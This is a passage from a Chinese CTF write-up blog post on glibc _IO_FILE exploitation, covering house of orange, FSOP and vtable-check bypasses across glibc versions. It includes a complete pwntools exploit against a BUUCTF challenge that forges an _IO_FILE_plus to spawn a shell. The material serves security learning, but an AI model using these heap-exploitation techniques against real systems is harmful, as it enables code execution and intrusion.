&#125;<br></code></pre></td></tr></table></figure>

<p>house of orange 利用过程：</p>
<p>修改一个 unsorted chunk 的 size 字段为0x60，利用 unsorted bin attack 将 _IO_list_all 修改为 main_arena+0x58，而IO_list_all 中的 *chain 指针位于 _IO_list_all + 0x68 的位置：即 main_arena + 0x58 + 0x68 是 small bin 中大小为0x60的位置，所以需要将 chunk 的 size 修改为0x60，让该 chunk 链入 small bin 的相应位置上，在其上布置好伪造的 _IO_FILE_plus，那么就形成了一个伪造的 chain 链。伪造这些后，只要再分配一个 chunk，就会触发 malloc_printerr，会遍历IO_llist_all，最终调用 IO_overflow 函数，以下是源码讲解部分：</p>
<p>malloc_printerr：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">if</span> (__builtin_expect (chunksize_nomask (victim) &lt;= <span class="hljs-number">2</span> * SIZE_SZ, <span class="hljs-number">0</span>)<br>           || __builtin_expect (chunksize_nomask (victim)<br>                                &gt; av-&gt;system_mem, <span class="hljs-number">0</span>))<br>         malloc_printerr (<span class="hljs-string">&quot;malloc(): memory corruption&quot;</span>);<br></code></pre></td></tr></table></figure>

<p>触发 malloc_printerr 后，会形成下列调用链：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs c">mallloc_printerr-&gt; __libc_message—&gt;<span class="hljs-built_in">abort</span>-&gt;flush-&gt;_IO_flush_all_lock-&gt;_IO_OVERFLOW<br>而_IO_OVERFLOW最后会调用vtable表中的__overflow 函数<br></code></pre></td></tr></table></figure>

<p>_IO_flush_all_lockp：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs c">_IO_flush_all_lockp (<span class="hljs-keyword">int</span> do_lock)<br>&#123;<br>  <span class="hljs-keyword">int</span> result = <span class="hljs-number">0</span>;<br>  FILE *fp;<br><span class="hljs-meta">#<span class="hljs-meta-keyword">ifdef</span> _IO_MTSAFE_IO</span><br>  _IO_cleanup_region_start_noarg (flush_cleanup);<br>  _IO_lock_lock (list_all_lock);<br><span class="hljs-meta">#<span class="hljs-meta-keyword">endif</span></span><br>  <span class="hljs-keyword">for</span> (fp = (FILE *) _IO_list_all; fp != <span class="hljs-literal">NULL</span>; fp = fp-&gt;_chain)<br>    &#123;<br>      run_fp = fp;<br>      <span class="hljs-keyword">if</span> (do_lock)<br>        _IO_flockfile (fp);<br>      <span class="hljs-keyword">if</span> (((fp-&gt;_mode &lt;= <span class="hljs-number">0</span> &amp;&amp; fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base)<span class="hljs-comment">/*一些检查，需要绕过*/</span><br>           || (_IO_vtable_offset (fp) == <span class="hljs-number">0</span><br>               &amp;&amp; fp-&gt;_mode &gt; <span class="hljs-number">0</span> &amp;&amp; (fp-&gt;_wide_data-&gt;_IO_write_ptr<br>                                    &gt; fp-&gt;_wide_data-&gt;_IO_write_base))<span class="hljs-comment">/*也可以绕过这个*/</span><br>           )<br>          &amp;&amp; _IO_OVERFLOW (fp, EOF) == EOF)<span class="hljs-comment">/*遍历_IO_list_all ，选出_IO_FILE作为_IO_OVERFLOW的参数，执行函数*/</span><br>        result = EOF;<br>      <span class="hljs-keyword">if</span> (do_lock)<br>        _IO_funlockfile (fp);<br>      run_fp = <span class="hljs-literal">NULL</span>;<br>    &#125;<br><span class="hljs-meta">#<span class="hljs-meta-keyword">ifdef</span> _IO_MTSAFE_IO</span><br>  _IO_lock_unlock (list_all_lock);<br>  _IO_cleanup_region_end (<span class="hljs-number">0</span>);<br><span class="hljs-meta">#<span class="hljs-meta-keyword">endif</span></span><br>  <span class="hljs-keyword">return</span> result;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>所以伪造的 _IO_FILE_plus 要通过下列检查：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-number">1.</span>((fp-&gt;_mode &lt;= <span class="hljs-number">0</span> &amp;&amp; fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base)<br>   <br>或者是<br><span class="hljs-number">2.</span><br>_IO_vtable_offset (fp) == <span class="hljs-number">0</span> <br>&amp;&amp; fp-&gt;_mode &gt; <span class="hljs-number">0</span> <br>&amp;&amp; (fp-&gt;_wide_data-&gt;_IO_write_ptr &gt; fp-&gt;_wide_data-&gt;_IO_write_base)<br></code></pre></td></tr></table></figure>

<h5 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h5><p>来自buu的题目，程序不存在 delete 函数，无法释放堆块，所以要用到前面的修改 top chunk size 的方法，从而得到 libc 地址。</p>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20220313210805600.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220313210805600</span></p>
<p>漏洞点在于 edit 函数，对于写入的个数没做严格的限制，可以写入大于申请堆块长度的内容，从而存在堆溢出。</p>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20220313210907191.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220313210907191</span></p>
<p>伪造 IO_FILE_plus 后的成果如下：</p>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20220313170817299.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220313170817299</span></p>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20220313170916290.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220313170916290</span></p>
<p>最终只能在本地getshell</p>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20220313173210640.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220313173210640</span></p>
<p>远程一直都是显示 dumped core</p>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20220313173230192.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220313173230192</span></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!usr/bin/env python </span><br><span class="hljs-comment">#coding=utf-8</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(arch = <span class="hljs-string">&#x27;amd64&#x27;</span>,os = <span class="hljs-string">&#x27;linux&#x27;</span>,log_level = <span class="hljs-string">&#x27;debug&#x27;</span>)<br>elf = ELF(<span class="hljs-string">&quot;./house_of_orange&quot;</span>)<br>libc = ELF(<span class="hljs-string">&quot;/home/shoucheng/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/libc-2.23.so&quot;</span>)<br><span class="hljs-comment">#libc = ELF(&quot;./libc-2.23.so&quot;)</span><br>ld = ELF(<span class="hljs-string">&quot;/home/shoucheng/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/ld-2.23.so&quot;</span>)<br>p = process(argv=[ld.path,elf.path],env=&#123;<span class="hljs-string">&quot;LD_PRELOAD&quot;</span> : libc.path&#125;)<br>p = remote(<span class="hljs-string">&quot;node4.buuoj.cn&quot;</span>, <span class="hljs-number">26547</span>)<br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">debug</span>():</span><br>	gdb.attach(p,<span class="hljs-string">&quot;b main&quot;</span>)<br>	<span class="hljs-comment">#gdb.attach(p,&quot;b *$rebase(0x)&quot;)</span><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">add</span>(<span class="hljs-params">size, content</span>):</span><br>    p.sendlineafter(<span class="hljs-string">&quot;: &quot;</span>,<span class="hljs-string">&#x27;1&#x27;</span>)<br>    p.recvuntil(<span class="hljs-string">&quot;Length of name :&quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(size))<br>    p.recvuntil(<span class="hljs-string">&quot;Name :&quot;</span>)<br>    p.send(content)<br>    p.recvuntil(<span class="hljs-string">&quot;Price of Orange:&quot;</span>)<br>    p.send(<span class="hljs-built_in">str</span>(<span class="hljs-number">520</span>))<br>    p.recvuntil(<span class="hljs-string">&quot;Color of Orange:&quot;</span>)<br>    p.send(<span class="hljs-built_in">str</span>(<span class="hljs-number">3</span>))<br>    <br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">edit</span>(<span class="hljs-params">content</span>):</span><br>    p.sendlineafter(<span class="hljs-string">&quot;: &quot;</span>,<span class="hljs-string">&#x27;3&#x27;</span>)<br>    p.recvuntil(<span class="hljs-string">&quot;Length of name :&quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(<span class="hljs-built_in">len</span>(content)))<br>    p.recvuntil(<span class="hljs-string">&quot;Name:&quot;</span>)<br>    p.send(content)<br>    p.recvuntil(<span class="hljs-string">&quot;Price of Orange:&quot;</span>)<br>    p.send(<span class="hljs-built_in">str</span>(<span class="hljs-number">520</span>))<br>    p.recvuntil(<span class="hljs-string">&quot;Color of Orange:&quot;</span>)<br>    p.send(<span class="hljs-built_in">str</span>(<span class="hljs-number">3</span>))<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">show</span>():</span><br>    p.sendlineafter(<span class="hljs-string">&quot;: &quot;</span>,<span class="hljs-string">&#x27;2&#x27;</span>)<br>    <br>add(<span class="hljs-number">0x30</span>, <span class="hljs-string">&#x27;a&#x27;</span>)<br>payload = <span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x38</span> + p64(<span class="hljs-number">0x21</span>) + <span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x18</span> + p64(<span class="hljs-number">0xf81</span>)<br>edit(payload)<br>add(<span class="hljs-number">0x1000</span>, <span class="hljs-string">&#x27;a&#x27;</span>)<br><br>add(<span class="hljs-number">0x400</span>, <span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x8</span>)<br>show()<br>p.recvuntil(<span class="hljs-string">&quot;aaaaaaaa&quot;</span>)<br>libc_base = u64(p.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">&#x27;\x00&#x27;</span>)) - <span class="hljs-number">0x3c5188</span><br>log.info(<span class="hljs-string">&quot;libc_base==&gt;0x%x&quot;</span> %libc_base)<br>_IO_list_all = libc.symbols[<span class="hljs-string">&#x27;_IO_list_all&#x27;</span>] + libc_base<br>sys = libc_base + libc.sym[<span class="hljs-string">&#x27;system&#x27;</span>] <br>edit(<span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x10</span>)<br>show()<br>p.recvuntil(<span class="hljs-string">&quot;a&quot;</span>*<span class="hljs-number">0x10</span>)<br>heap_base = u64(p.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">&#x27;\x00&#x27;</span>)) - <span class="hljs-number">0xe0</span><br>log.info(<span class="hljs-string">&quot;heap_base==&gt;0x%x&quot;</span> %heap_base)<br><br>vtable_addr = heap_base + <span class="hljs-number">0x5e8</span><br>stream = <span class="hljs-string">&quot;/bin/sh\x00&quot;</span> + p64(<span class="hljs-number">0x61</span>)<br>stream += p64(<span class="hljs-number">0</span>) + p64(_IO_list_all-<span class="hljs-number">0x10</span>)<br>stream += p64(<span class="hljs-number">1</span>) + p64(<span class="hljs-number">2</span>) <span class="hljs-comment"># fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base</span><br>stream = stream.ljust(<span class="hljs-number">0xc0</span>, <span class="hljs-string">&quot;\x00&quot;</span>)<br>stream += p64(<span class="hljs-number">0</span>) <span class="hljs-comment"># mode&lt;=0</span><br>stream += p64(<span class="hljs-number">0</span>)<br>stream += p64(<span class="hljs-number">0</span>)<br>stream += p64(vtable_addr)<br>stream += p64(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span><br>stream += p64(sys)<br>payload = <span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x400</span> + p64(<span class="hljs-number">0</span>) + p64(<span class="hljs-number">0x21</span>) + <span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x10</span><br>payload += stream<br>edit(payload)<br>p.sendlineafter(<span class="hljs-string">&quot;: &quot;</span>,<span class="hljs-string">&#x27;1&#x27;</span>)<br><br>p.interactive()<br></code></pre></td></tr></table></figure>

<h3 id="高版本的下的FSOP"><a href="#高版本的下的FSOP" class="headerlink" title="高版本的下的FSOP"></a>高版本的下的FSOP</h3><h4 id="glibc-2-24-2-27"><a href="#glibc-2-24-2-27" class="headerlink" title="glibc-2.24~2.27"></a>glibc-2.24~2.27</h4><p>在<code>glibc-2.27</code>以及之后的源码中，<code>abort</code>中没有刷新流的操作，改用调用 exit 函数或者正常从 main 返回，执行<code>_IO_flush_all_lockp</code>来刷新<code>_IO_list_all</code> 链表中所有项的文件流，exit-&gt;__run_exit_handlers-&gt;_IO_cleanup-&gt;_IO_flush_all_lockp-&gt;…</p>
<p>对 vtable 指向的地址进行检查，检查地址是否落在 glibc 中的 vtable 段中，<code>__start___libc_IO_vtables</code>指向第一个vtable地址<code>_IO_helper_jumps</code>，而<code>__stop___libc_IO_vtables</code>指向最后一个。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">const</span> struct _IO_jump_t *</span><br><span class="hljs-function"><span class="hljs-title">IO_validate_vtable</span> <span class="hljs-params">(<span class="hljs-keyword">const</span> struct _IO_jump_t *vtable)</span></span><br><span class="hljs-function"></span>&#123;<br>  <span class="hljs-keyword">uintptr_t</span> section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;<br>  <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> *ptr = (<span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> *) vtable;<br>  <span class="hljs-keyword">uintptr_t</span> offset = ptr - __start___libc_IO_vtables;<br>  <span class="hljs-keyword">if</span> (__glibc_unlikely (offset &gt;= section_length)) <span class="hljs-comment">//检查vtable指针是否在glibc的vtable段中。</span><br>    <span class="hljs-comment">/* The vtable pointer is not in the expected section.  Use the</span><br><span class="hljs-comment">       slow path, which will terminate the process if necessary.  */</span><br>    _IO_vtable_check ();<br>  <span class="hljs-keyword">return</span> vtable;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>进入到<code>_IO_vtable_check ()</code> 比较难绕过其中检查（虽难也是可以实现），所以要让指针落在 vtable 段中。总共有两种办法可以通过检查，进行利用：</p>
<ol>
<li>使用内部的vtable<code>_IO_str_jumps</code>或<code>_IO_wstr_jumps</code>来进行利用。</li>
<li>使用缓冲区指针来进行任意内存读写。</li>
</ol>
<h5 id="IO-str-jumps或-IO-wstr-jumps"><a href="#IO-str-jumps或-IO-wstr-jumps" class="headerlink" title="_IO_str_jumps或_IO_wstr_jumps"></a><code>_IO_str_jumps</code>或<code>_IO_wstr_jumps</code></h5><p>vtable数组中存在<code>_IO_str_jumps</code>以及<code>_IO_wstr_jumps</code>两个vtable。这两个vtable较为相似，只是<code>_IO_wstr_jumps</code>是处理wchar的，后者利用方法完全相同，介绍其一即可，以<code>_IO_str_jumps</code>为例。</p>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20220317222314932.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220317222314932</span></p>
<p>其中一个可利用函数 _IO_str_finish 源代码如下：</p>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20220317233212853.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220317233212853</span></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">void</span><br>_IO_str_finish (_IO_FILE *fp, <span class="hljs-keyword">int</span> dummy)<br>&#123;<br>  <span class="hljs-keyword">if</span> (fp-&gt;_IO_buf_base &amp;&amp; !(fp-&gt;_flags &amp; _IO_USER_BUF))<br>    (((_IO_strfile *) fp)-&gt;_s._free_buffer) (fp-&gt;_IO_buf_base); <span class="hljs-comment">//执行函数 call qword ptr [fp+0xE8h]</span><br>  fp-&gt;_IO_buf_base = <span class="hljs-literal">NULL</span>;<br>  <br>  _IO_default_finish (fp, <span class="hljs-number">0</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>可以看见，如果满足条件，将直接把<code>fp-&gt;_s._free_buffer</code>当作函数指针来调用。那么，只要在之前低版本布置的vtable 修改为<code>_IO_str_jumps-8</code>，这样就会使得 _IO_str_finish 成为了伪造的vtable地址的 _IO_OVERFLOW 函数，并且这个地址是在 vtable 段中的，可以满足检查。</p>
<p>然后去构造 fp-&gt;_IO_buf_base 为 “/bin/sh\x00”的地址，即可满足判断条件，同时也满足了后面作为参数的需求。</p>
<p>接着构造 fp-&gt;_flags 不包含 _IO_USER_BUF 。它的定义为<code>#define _IO_USER_BUF 1</code>， 即 fp-&gt;_flags 最低位为0即可 。</p>
<p>最后把 fp-&gt;_s._free_buffer 修改为 system 或者 one_gadget 。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python">vtable = _IO_str_jumps - <span class="hljs-number">0x8</span><br>fp-&gt;_flags = <span class="hljs-number">0</span><br>fp-&gt;_IO_buf_base = binsh_addr<br>fp + <span class="hljs-number">0xe8</span> = system_addr<br></code></pre></td></tr></table></figure>



<p>另一个可以利用函数 _IO_str_overflow，源码如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">int</span> _IO_str_overflow (_IO_FILE *fp, <span class="hljs-keyword">int</span> c)<br>&#123;<br>[...]<br>    &#123;<br>      <span class="hljs-keyword">if</span> (fp-&gt;_flags &amp; _IO_USER_BUF) <span class="hljs-comment">// not allowed </span><br>    <span class="hljs-keyword">return</span> EOF;<br>      <span class="hljs-keyword">else</span><br>    &#123;<br>      <span class="hljs-keyword">char</span> *new_buf;<br>      <span class="hljs-keyword">char</span> *old_buf = fp-&gt;_IO_buf_base;<br>      <span class="hljs-keyword">size_t</span> old_blen = _IO_blen (fp);<br>      _IO_size_t new_size = <span class="hljs-number">2</span> * old_blen + <span class="hljs-number">100</span>;                <br>      <span class="hljs-keyword">if</span> (new_size &lt; old_blen)<br>        <span class="hljs-keyword">return</span> EOF;<br>      new_buf<br>        = (<span class="hljs-keyword">char</span> *) (*((_IO_strfile *) fp)-&gt;_s._allocate_buffer) (new_size);<br>    [...]<br>&#125;<br></code></pre></td></tr></table></figure>

<p> old_blen 是通过 _IO_buf_end 减去 _IO_buf_base 得到的，并且指向的 _IO_str_overflow 偏移是一致的，所以不需要更改，因此需要增添的地方如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs c">vtable = _IO_str_jumps<br>fp-&gt;_flags = <span class="hljs-number">0</span><br>fp-&gt;_IO_buf_base = <span class="hljs-number">0</span><br>fp-&gt;_IO_buf_end = (bin_sh_addr - <span class="hljs-number">100</span>) / <span class="hljs-number">2</span><br>fp + <span class="hljs-number">0xe8</span> = system_addr<br></code></pre></td></tr></table></figure>

<p>另：</p>
<p>如果libc中没有<code>_IO_wstr_jumps</code>与<code>_IO_str_jumps</code>表的符号，给出定位<code>_IO_str_jumps</code>与<code>_IO_wstr_jumps</code>的方法：</p>
<ul>
<li>定位<code>_IO_str_jumps</code>表的方法，<code>_IO_str_jumps</code>是vtable中的倒数第二个表，可以通过vtable的最后地址减去<code>0x168</code>。</li>
<li>定位<code>_IO_wstr_jumps</code>表的方法，可以通过先定位<code>_IO_wfile_jumps</code>，得到它的偏移后再减去<code>0x240</code>即是<code>_IO_wstr_jumps</code>的地址。</li>
</ul>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/t01e8528e095b25d09d.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">img</span></p>
<p>glibc-2.28 中直接使用 malloc 和 free 替换掉原来在 _IO_str_fields 里的 <code>_allocate_buffer</code> 和 <code>_free_buffer</code>。因而不再使用偏移，无法再利用 __libc_IO_vtables 上的 vtable 绕过检查，于是上面的利用技术都失效了。</p>
<h4 id="glibc-2-29-2-34-0ubuntu3"><a href="#glibc-2-29-2-34-0ubuntu3" class="headerlink" title="glibc-2.29~2.34 0ubuntu3"></a>glibc-2.29~2.34 0ubuntu3</h4><p>glibc-2.24中我们伪造vtable是因为其不可写，但是在 glibc-2.29~2.34 0ubuntu3中，vtable是可写的</p>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20220824163622145.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220824163622145</span></p>
<p>因此可以选择覆盖_IO_file_jumps</p>
<p>参考文章：</p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/2e00afb01606">https://www.jianshu.com/p/2e00afb01606</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/A951860555/article/details/116425824">https://blog.csdn.net/A951860555/article/details/116425824</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/elvirangel/p/7843842.html">https://www.cnblogs.com/elvirangel/p/7843842.html</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/w12315q/article/details/84328447">https://blog.csdn.net/w12315q/article/details/84328447</a></p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/177910">https://www.anquanke.com/post/id/177910</a></p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/177958">https://www.anquanke.com/post/id/177958</a></p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/84987">https://www.anquanke.com/post/id/84987</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/5508?spm=5176.12901015.0.i12901015.22a8525cU0EiiN">https://xz.aliyun.com/t/5508?spm=5176.12901015.0.i12901015.22a8525cU0EiiN</a></p>

      </section>
      <section class="extra">
        
          <ul class="copyright">
  
    <li><strong>本文作者：</strong>ShouCheng</li>
    <li><strong>本文链接：</strong><a href="http://shoucheng3.github.io/2021/11/06/2021-11-06-IO-FLIE/index.html" title="http:&#x2F;&#x2F;shoucheng3.github.io&#x2F;2021&#x2F;11&#x2F;06&#x2F;2021-11-06-IO-FLIE&#x2F;index.html">http:&#x2F;&#x2F;shoucheng3.github.io&#x2F;2021&#x2F;11&#x2F;06&#x2F;2021-11-06-IO-FLIE&#x2F;index.html</a></li>
    <li><strong>版权声明：</strong>本博客所有文章均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" title="BY-NC-SA" target="_blank" rel="noopener">BY-NC-SA</a> 许可协议，转载请注明出处！</li>
  
</ul>
        
        
        
  <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/PWN%E3%80%81-IO-FILE/" rel="tag">PWN、_IO_FILE</a></li></ul> 

        
  <nav class="nav">
    <a href="/2021/11/08/2021-12-08-pwnable-tw/"><i class="iconfont iconleft"></i>pwnable.tw</a>
    <a href="/2021/11/03/2021-11-03-2021%E6%9F%8F%E9%B9%AD%E6%9D%AF/">2021柏鹭杯<i class="iconfont iconright"></i></a>
  </nav>

      </section>
      
        <section class="comments">
  
    <div class="btn" id="comments-btn">查看评论</div>
  
  
</section>
      
    </section>
  </div>
</article></div>
      <div class="col-xl-3">
        
          
  <aside class="toc-wrap">
    <h3 class="toc-title">文章目录：</h3>
